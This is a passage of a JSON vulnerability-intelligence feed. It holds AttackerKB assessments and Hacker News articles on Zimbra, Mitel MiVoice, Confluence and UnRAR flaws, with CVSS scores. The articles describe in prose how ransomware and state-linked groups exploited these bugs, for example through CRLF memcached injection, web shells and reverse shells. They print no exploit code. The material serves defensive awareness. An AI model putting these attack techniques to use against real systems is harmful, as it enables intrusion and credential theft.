"2022-11-10T00:00:00", "id": 
"AKB:82991046-210F-4C54-A578-8E09BD9F6D88", "href": "https://attackerkb.com/topics/1DDTvUNFzH/cve-2022-41352", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T23:15:56", "description": "The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2022-29499", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-04-26T00:00:00", "id": "AKB:9CE495DA-1E3B-4486-85DA-2F4FAB15E355", "href": "https://attackerkb.com/topics/M1DmDykURB/cve-2022-29499", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T15:01:09", "description": "The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user 
account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-20T00:00:00", "type": "attackerkb", "title": "CVE-2022-26138", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-20T00:00:00", "id": "AKB:8049CCA9-ACA9-4288-8493-4153794BD621", "href": "https://attackerkb.com/topics/BUK2DJ8uhl/cve-2022-26138", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T14:45:10", "description": "RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a 
~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at July 18, 2022 4:55pm UTC reported:\n\nWhile we focused on Zimbra in our analysis, there are almost certainly other targets for this vulnerability that we are not aware of yet.\n\nExploiting this against Zimbra is really bad \u2013 it can be done fairly quietly and it doesn\u2019t require direct access to the server, and can easily lead to root access to the server hosting users\u2019 email. This is super urgent to patch on Zimbra!\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-07-19T00:00:00", "type": "attackerkb", "title": "CVE-2022-30333", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-07-19T00:00:00", "id": "AKB:EFC2EE2A-9172-4B00-94C9-6CC133BD4B05", "href": "https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "thn": [{"lastseen": "2022-08-12T08:05:53", "description": 
"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/08/11/cisa-adds-two-known-exploited-vulnerabilities-catalog>) two flaws to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), citing evidence of active exploitation.\n\nThe two high-severity issues relate to weaknesses in Zimbra Collaboration, both of which could be chained to achieve unauthenticated remote code execution on affected email servers -\n\n * [**CVE-2022-27925**](<https://nvd.nist.gov/vuln/detail/CVE-2022-27925>) (CVSS score: 7.2) - Remote code execution (RCE) through mboximport from authenticated user (fixed in [versions](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>) 8.8.15 Patch 31 and 9.0.0 Patch 24 released in March)\n * [**CVE-2022-37042**](<https://nvd.nist.gov/vuln/detail/CVE-2022-37042>) \\- Authentication bypass in MailboxImportServlet (fixed in [versions](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>) 8.8.15 Patch 33 and 9.0.0 Patch 26 released in August)\n\n\"If you are running a Zimbra version that is older than Zimbra 8.8.15 patch 33 or Zimbra 9.0.0 patch 26 you should update to the latest patch as soon as possible,\" Zimbra [warned](<https://blog.zimbra.com/2022/08/authentication-bypass-in-mailboximportservlet-vulnerability/>) earlier this week.\n\nCISA has not shared any information on the attacks exploiting the flaws but cybersecurity firm Volexity [described](<https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/>) mass in-the-wild exploitation of Zimbra instances by an unknown threat 
actor.\n\nIn a nutshell, the attacks involve taking advantage of the aforementioned authentication bypass flaw to gain remote code execution on the underlying server by uploading arbitrary files.\n\nVolexity said \"it was possible to bypass authentication when accessing the same endpoint (mboximport) used by CVE-2022-27925,\" and that the flaw \"could be exploited without valid administrative credentials, thus making the vulnerability significantly more critical in severity.\"\n\nIt also singled out over 1,000 instances globally that were backdoored and compromised using this attack vector, some of which belong to government departments and ministries; military branches; and companies with billions of dollars of revenue.\n\nThe attacks, which transpired as recently as the end of June 2022, also involved the deployment of web shells to maintain long-term access to the infected servers. Top countries with the most compromised instances include the U.S., Italy, Germany, France, India, Russia, Indonesia, Switzerland, Spain, and Poland.\n\n\"CVE-2022-27925 was originally listed as an RCE exploit requiring authentication,\" Volexity said. \"When combined with a separate bug, however, it became an unauthenticated RCE exploit that made remote exploitation trivial.\"\n\nThe disclosure comes a week after CISA added another Zimbra-related bug, [CVE-2022-27924](<https://thehackernews.com/2022/08/cisa-adds-zimbra-email-vulnerability-to.html>), to the catalog, which, if exploited, could allow attackers to steal cleartext credentials from users of the targeted instances.\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-12T06:14:00", "type": "thn", "title": "Researchers Warn of Ongoing Mass Exploitation of Zimbra RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924", "CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-12T06:14:20", "id": "THN:76E9C775EE4ECFF3F3F1E02BCA0BE2F2", "href": "https://thehackernews.com/2022/08/researchers-warn-of-ongoing-mass.html", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T08:12:43", "description": "A new intelligence gathering campaign linked to the prolific 
North Korean state-sponsored Lazarus Group leveraged known security flaws in unpatched Zimbra devices to compromise victim systems.\n\nThat's according to Finnish cybersecurity company WithSecure (formerly F-Secure), which codenamed the incident **No Pineapple** in reference to an error message that's used in one of the backdoors.\n\nTargets of the malicious operation included a healthcare research organization in India, the chemical engineering department of a leading research university, as well as a manufacturer of technology used in the energy, research, defense, and healthcare sectors, suggesting an attempt to breach the supply chain.\n\nRoughly 100GB of data is estimated to have been exported by the hacking crew following the compromise of an unnamed customer, with the digital break-in likely taking place in the third quarter of 2022.\n\n\"The threat actor gained access to the network by exploiting a vulnerable Zimbra mail server at the end of August,\" WithSecure said in a [detailed technical report](<https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector>) shared with The Hacker News.\n\nThe security flaws used for initial access are [CVE-2022-27925 and CVE-2022-37042](<https://thehackernews.com/2022/08/researchers-warn-of-ongoing-mass.html>), both of which could be abused to gain remote code execution on the underlying server.\n\nThis step was succeeded by the installation of web shells and the exploitation of local privilege escalation vulnerability in the Zimbra server (i.e., [Pwnkit](<https://thehackernews.com/2022/06/cisa-warns-of-active-exploitation-of.html>) aka CVE-2021-4034), thereby enabling the threat actor to harvest sensitive mailbox data.\n\nSubsequently, in October 2022, the adversary is said to have carried out lateral movement, reconnaissance, and ultimately deployed backdoors such as Dtrack and an updated version of 
GREASE.\n\n[GREASE](<https://www.cisa.gov/uscert/ncas/alerts/aa20-301a>), which has been attributed as the handiwork of another North Korea-affiliated threat cluster called [Kimsuky](<https://thehackernews.com/2022/07/north-korean-hackers-using-malicious.html>), comes with [capabilities](<https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia>) to create new administrator accounts with remote desktop protocol (RDP) privileges while also skirting firewall rules.\n\nDtrack, on the other hand, has been employed in [cyber assaults](<https://thehackernews.com/2022/11/north-korean-hackers-targeting-europe.html>) aimed at a variety of industry verticals, and also in financially motivated attacks involving the use of [Maui ransomware](<https://thehackernews.com/2022/08/experts-uncover-details-on-maui.html>).\n\n\"At the beginning of November, Cobalt Strike [command-and-control] beacons were detected from an internal server to two threat actor IP addresses,\" researchers Sami Ruohonen and Stephen Robinson pointed out, adding the data exfiltration occurred from November 5, 2022, through November 11, 2022.\n\nAlso used in the intrusion were tools like Plink and 3Proxy to create a proxy on the victim system, echoing [previous findings](<https://thehackernews.com/2022/09/north-korean-lazarus-hackers-targeting.html>) from Cisco Talos about Lazarus Group's attacks targeting energy providers.\n\nBesides relying solely on an IP address-based infrastructure without any domain names, a crucial link exposing the campaign's links to North Korea stems from a connection originating from an IP address located in the country (175.45.176[.]27) to the patient zero server.\n\n[North Korea-backed hacking groups](<https://www.mandiant.com/resources/blog/mapping-dprk-groups-to-government>) have had a busy 2022, conducting a series of both espionage-driven attacks and [cryptocurrency heists](<https://thehackernews.com/2023/01/fbi-says-north-korean-hackers-behind.html>) that 
align with the regime's strategic priorities.\n\nMost recently, the BlueNoroff cluster, also known by the names APT38, Copernicium, Stardust Chollima, and TA444, was [connected](<https://thehackernews.com/2023/01/north-korean-hackers-turn-to-credential.html>) to wide-ranging credential harvesting attacks aimed at education, financial, government, and healthcare sectors.\n\n\"North Korea-linked hackers such as those in cybercriminal syndicate Lazarus Group have been by far the most prolific cryptocurrency hackers over the last few years,\" blockchain analytics firm Chainalysis [said](<https://blog.chainalysis.com/reports/2022-biggest-year-ever-for-crypto-hacking/>), calling 2022 the \"biggest year ever for crypto hacking.\"\n\nIn 2022 alone, the threat actors have been accused of being responsible for $1.65 billion worth of cryptocurrency theft, out of which $1.1 billion originated from hacks of DeFi protocols. A total of $3.8 billion was stolen from crypto businesses during the year, up from $3.3 billion in 2021.\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-02T09:45:00", "type": "thn", "title": "North Korean Hackers Exploit Unpatched Zimbra Devices in 'No Pineapple' Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4034", "CVE-2022-27925", "CVE-2022-37042"], "modified": "2023-02-03T07:08:18", "id": "THN:542C8086F46B453764514414E6C59C5E", "href": "https://thehackernews.com/2023/02/north-korean-hackers-exploit-unpatched.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T16:23:00", "description": "The operators behind the Lorenz ransomware operation have been observed exploiting a 
now-patched critical security flaw in Mitel MiVoice Connect to obtain a foothold into target environments for follow-on malicious activities.\n\n\"Initial malicious activity originated from a Mitel appliance sitting on the network perimeter,\" researchers from cybersecurity firm Arctic Wolf [said](<https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/>) in a report published this week.\n\n\"Lorenz exploited [CVE-2022-29499](<https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002>), a remote code execution vulnerability impacting the Mitel Service Appliance component of MiVoice Connect, to obtain a reverse shell and subsequently used [Chisel](<https://github.com/jpillora/chisel>) as a tunneling tool to pivot into the environment.\"\n\nLorenz, like many other ransomware groups, is known for double extortion by exfiltrating data prior to encrypting systems, with the actor targeting small and medium businesses (SMBs) located in the U.S., and to a lesser extent in China and Mexico, since at least February 2021.\n\nCalling it an \"ever-evolving ransomware,\" Cybereason [noted](<https://www.cybereason.com/blog/research/cybereason-vs.-lorenz-ransomware>) that Lorenz \"is believed to be a rebranding of the '.sZ40' ransomware that was discovered in October 2020.\"\n\nThe weaponization of Mitel VoIP appliances for ransomware attacks mirrors recent findings from CrowdStrike, which [disclosed](<https://thehackernews.com/2022/06/hackers-exploit-mitel-voip-zero-day-bug.html>) details of a ransomware intrusion attempt that leveraged the same tactic to achieve remote code execution against an unnamed target.\n\nMitel VoIP products are also a [lucrative entry point](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>) in light of the fact that there are nearly 20,000 internet-exposed devices online, as [revealed](<https://twitter.com/GossiTheDog/status/1540309810176217088>) by 
security researcher Kevin Beaumont, rendering them vulnerable to malicious attacks.\n\nIn one Lorenz ransomware attack investigated by Arctic Wolf, the threat actors weaponized the remote code execution flaw to establish a reverse shell and download the Chisel proxy utility.\n\nThis implies that the initial access was either facilitated with the help of an initial access broker ([IAB](<https://thehackernews.com/2022/03/google-uncovers-initial-access-broker.html>)) that's in possession of an exploit for CVE-2022-29499 or that the threat actors have the ability to do so themselves. \n\nWhat's also notable is that the Lorenz group waited for almost a month after obtaining initial access to conduct post-exploitation actions, including establishing persistence by means of a web shell, harvesting credentials, network reconnaissance, privilege escalation, and lateral movement.\n\nThe compromise eventually culminated in the exfiltration of data using FileZilla, following which the hosts were encrypted using Microsoft's BitLocker service, underscoring the [continued abuse](<https://thehackernews.com/2022/09/microsoft-warns-of-ransomware-attacks.html>) of living-off-the-land binaries (LOLBINs) by adversaries.\n\n\"Monitoring just critical assets is not enough for organizations,\" the researchers said, adding \"security teams should monitor all externally facing devices for potential malicious activity, including VoIP and IoT devices.\"\n\n\"Threat actors are beginning to shift targeting to lesser known or monitored assets to avoid detection.\"\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T14:04:00", "type": "thn", "title": "Lorenz Ransomware Exploit Mitel VoIP Systems to Breach Business Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-09-14T14:04:33", "id": "THN:065BFC8E7532E662AE90BB82F405B132", "href": "https://thehackernews.com/2022/09/lorenz-ransomware-exploit-mitel-voip.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T07:00:49", "description": "The U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) on Friday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/07/29/cisa-adds-one-known-exploited-vulnerability-catalog>) the recently disclosed Atlassian security flaw to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.\n\nThe vulnerability, tracked as [CVE-2022-26138](<https://thehackernews.com/2022/07/atlassian-releases-patch-for-critical.html>), concerns the use of hard-coded credentials when the Questions For Confluence app is enabled in Confluence Server and Data Center instances.\n\n\"A remote unauthenticated attacker can use these credentials to log into Confluence and access all content accessible to users in the confluence-users group,\" CISA [notes](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in its advisory.\n\nDepending on the page restrictions and the information a company has in Confluence, successful exploitation of the shortcoming could lead to the disclosure of sensitive information.\n\nAlthough the bug was addressed by the Australian software company last week in versions 2.7.38 and 3.0.5, it has since come [under active exploitation](<https://thehackernews.com/2022/07/latest-critical-atlassian-confluence.html>), cybersecurity firm Rapid7 disclosed this week.\n\n\"Exploitation efforts at this point do not seem to be very widespread, though we expect that to change,\" Erick Galinkin, principal AI researcher at Rapid7, told The Hacker News.\n\n\"The good news is that the vulnerability is in the Questions for Confluence app and _not_ in Confluence itself, which reduces the attack surface significantly.\"\n\nWith the flaw now added to the catalog, Federal 
Civilian Executive Branch (FCEB) agencies in the U.S. are mandated to apply patches by August 19, 2022, to reduce their exposure to cyberattacks.\n\n\"At this point, the vulnerability has been public for a relatively short amount of time,\" Galinkin noted. \"Coupled with the absence of meaningful post-exploitation activity, we don't yet have any threat actors attributed to the attacks.\"\n", "cvss3": {}, "published": "2022-07-30T03:54:00", "type": "thn", "title": "CISA Warns of Atlassian Confluence Hard-Coded Credential Bug Exploited in Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-02T06:42:46", "id": "THN:908A39F901145B6FD175B16E95137ACC", "href": "https://thehackernews.com/2022/07/cisa-warns-of-atlassian-confluence-hard.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-29T03:59:30", "description": "A week after Atlassian rolled out patches to contain a critical flaw in its Questions For Confluence app for Confluence Server and Confluence Data Center, the shortcoming has now come under active exploitation in the wild.\n\nThe bug in question is [CVE-2022-26138](<https://thehackernews.com/2022/07/atlassian-releases-patch-for-critical.html>), which concerns the use of a hard-coded password in the app that could be exploited by a remote, unauthenticated attacker to gain unrestricted access to all pages in Confluence.\n\nThe real-world exploitation 
follows the release of the hard-coded credentials on Twitter, prompting the Australian software company to prioritize patches to mitigate potential threats targeting the flaw.\n\n\"Unsurprisingly, it didn't take long [...] to observe exploitation once the hard-coded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks,\" Rapid7 security researcher Glenn Thorpe [said](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>).\n\nIt's worth noting that the bug only exists when the Questions for Confluence app is enabled. That said, uninstalling the Questions for Confluence app does not remediate the flaw, as the created account does not get automatically removed after the app has been uninstalled.\n\nUsers of the affected product are advised to update their on-premise instances to the latest versions (2.7.38 and 3.0.5) as soon as possible, or take steps to disable/delete the account.\n\nThe development also arrives as Palo Alto Networks, in its [2022 Unit 42 Incident Response Report](<https://www.paloaltonetworks.com/unit42/2022-incident-response-report>), found that threat actors are scanning for vulnerable endpoints within 15 minutes of public disclosure of a new security flaw.\n", "cvss3": {}, "published": "2022-07-29T03:19:00", "type": "thn", "title": "Latest Critical Atlassian Confluence Vulnerability Under Active Exploitation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-29T03:22:24", "id": "THN:49CD77302B5D845459BA34357D9C011C", "href": "https://thehackernews.com/2022/07/latest-critical-atlassian-confluence.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-16T03:57:00", "description": 
"A new high-severity vulnerability has been disclosed in the Zimbra email suite that, if successfully exploited, enables an unauthenticated attacker to steal cleartext passwords of users without any user interaction.\n\n\"With the consequent access to the victims' mailboxes, attackers can potentially escalate their access to targeted organizations and gain access to various internal services and steal highly sensitive information,\" SonarSource [said](<https://blog.sonarsource.com/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/>) in a report shared with The Hacker News.\n\nTracked as [CVE-2022-27924](<https://nvd.nist.gov/vuln/detail/CVE-2022-27924>) (CVSS score: 7.5), the issue has been characterized as a case of \"Memcached poisoning with unauthenticated request,\" leading to a scenario where an adversary can inject malicious commands and siphon sensitive information.\n\nThis is made possible by poisoning the 
[IMAP](<https://en.wikipedia.org/wiki/Internet_Message_Access_Protocol>) route cache entries in the Memcached server that's used to look up Zimbra users and forward their HTTP requests to appropriate backend services. Memcached is an in-memory key-value storage system for use as a high performance cache or session store for external database and API calls \u2014 in this case the lookup service.\n\nGiven that Memcached parses incoming requests line-by-line, the vulnerability permits an attacker to send a specially crafted lookup request to the server containing [CRLF characters](<https://developer.mozilla.org/en-US/docs/Glossary/CRLF>), causing the server to execute unintended commands.\n\nThe flaw exists because \"newline characters (\\r\\n) are not escaped in untrusted user input,\" the researchers explained. \"This code flaw ultimately allows attackers to steal cleartext credentials from users of targeted Zimbra instances.\"\n\nArmed with this capability, the attacker can subsequently corrupt the cache to overwrite an entry such that it forwards all IMAP traffic to an attacker-controlled server, including the targeted user's credentials in cleartext.\n\nThat said, the attack presupposes the adversary already is in possession of the victims' email addresses so as to be able to poison the cache entries and that they use an IMAP client to retrieve email messages from a mail server.\n\n\"Typically, an organization uses a pattern for email addresses for their members, such as e.g., {firstname}.{lastname}@example.com,\" the researchers said. 
\"A list of email addresses could be obtained from OSINT sources such as LinkedIn.\"\n\nA threat actor, however, can get around these restrictions by exploiting a technique called [response smuggling](<https://capec.mitre.org/data/definitions/273.html>), which entails \"smuggling\" unauthorized HTTP responses that abuse the CRLF injection flaw to forward IMAP traffic to a rogue server, thereby stealing credentials from users without prior knowledge of their email addresses.\n\n\"The idea is that by continuously injecting more responses than there are work items into the shared response streams of Memcached, we can force random Memcached lookups to use injected responses instead of the correct response,\" the researchers explained. \"This works because Zimbra did not validate the key of the Memcached response when consuming it.\"\n\nFollowing responsible disclosure on March 11, 2022, patches to completely plug the security hole were [shipped](<https://blog.zimbra.com/2022/05/new-zimbra-security-patches-9-0-0-patch-24-1-and-8-8-15-patch-31-1/>) by Zimbra on May 10, 2022, in versions [8.8.15 P31.1](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31.1>) and [9.0.0 P24.1](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24.1>).\n\nThe findings arrive months after cybersecurity firm Volexity disclosed an espionage campaign dubbed [EmailThief](<https://thehackernews.com/2022/02/hackers-exploited-0-day-vulnerability.html>) that weaponized a zero-day vulnerability in the email platform to target European government and media entities in the wild.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-14T15:13:00", "type": "thn", "title": "New Zimbra Email Vulnerability Could Let Attackers Steal Your Login Credentials", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-06-16T03:13:54", "id": "THN:86F6539B2FD5CE0DEC7585157E18CBEF", "href": "https://thehackernews.com/2022/06/new-zimbra-email-vulnerability-could.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-05T05:59:49", "description": "The U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a recently disclosed high-severity vulnerability in the Zimbra email suite to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), citing [evidence of active exploitation](<https://www.cisa.gov/uscert/ncas/current-activity/2022/08/04/cisa-adds-one-known-exploited-vulnerability-catalog>).\n\nThe issue in question is [CVE-2022-27924](<https://thehackernews.com/2022/06/new-zimbra-email-vulnerability-could.html>) (CVSS score: 7.5), a command injection flaw in the platform that could lead to the execution of arbitrary Memcached commands and theft of sensitive information.\n\n\"Zimbra Collaboration (ZCS) allows an attacker to inject memcached commands into a targeted instance which causes an overwrite of arbitrary cached entries,\" CISA said.\n\nSpecifically, the bug relates to a case of insufficient validation of user input that, if successfully exploited, could enable attackers to steal cleartext credentials from users of targeted Zimbra instances.\n\nThe issue was [disclosed](<https://thehackernews.com/2022/06/new-zimbra-email-vulnerability-could.html>) by SonarSource in June, with [patches](<https://blog.zimbra.com/2022/05/new-zimbra-security-patches-9-0-0-patch-24-1-and-8-8-15-patch-31-1/>) released by Zimbra on May 10, 2022, in versions 8.8.15 P31.1 and 9.0.0 P24.1.\n\nCISA hasn't shared technical details of the attacks that exploit the vulnerability in the wild and has yet to attribute it to a certain threat actor.\n\nIn light of active exploitation of the flaw, users are advised to apply the updates to the software to reduce their exposure to potential cyberattacks.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": 